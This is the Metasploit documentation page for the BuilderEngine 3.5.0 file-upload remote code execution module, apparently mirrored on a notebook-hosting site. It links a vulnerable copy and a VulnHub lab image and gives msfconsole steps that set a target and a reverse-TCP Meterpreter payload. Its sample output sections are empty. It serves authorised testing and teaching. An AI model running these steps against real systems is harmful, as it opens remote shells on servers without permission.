Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/multi/http/builderengine_upload_exec.md
Views: 11784
BuilderEngine is a Content Management System (CMS) that is Open Source, and includes blog, eCommerce, booking modules, etc. A vulnerability was found in the jQuery upload plugin, which could be abused upload a malicious file, which would result in arbitrary remote code execution under the context of the web server.
Vulnerable Application
According to public advisory, BuilderEngine 3.5.0 is vulnerable to this attack.
A vulnerable copy was collected by Exploit-DB, which can be downloaded here:
https://www.exploit-db.com/apps/8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
Another way to test this exploit is by using the Sedna image:
https://www.vulnhub.com/entry/hackfest2016-sedna,181/#
Verification Steps
To see if the service is running BuilderEngine, you may use the check command from the module. If the resource is found, then you may see the following output:
Knowing that the jquery-file-upload
plugin is available, you can try the by following these steps:
In msfconsole, do
exploit/multi/http/builderengine_upload_exec
set RHOST [Target IP]
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST [Your IP]
exploit
If exploited successfully, you should see an output similar to the following: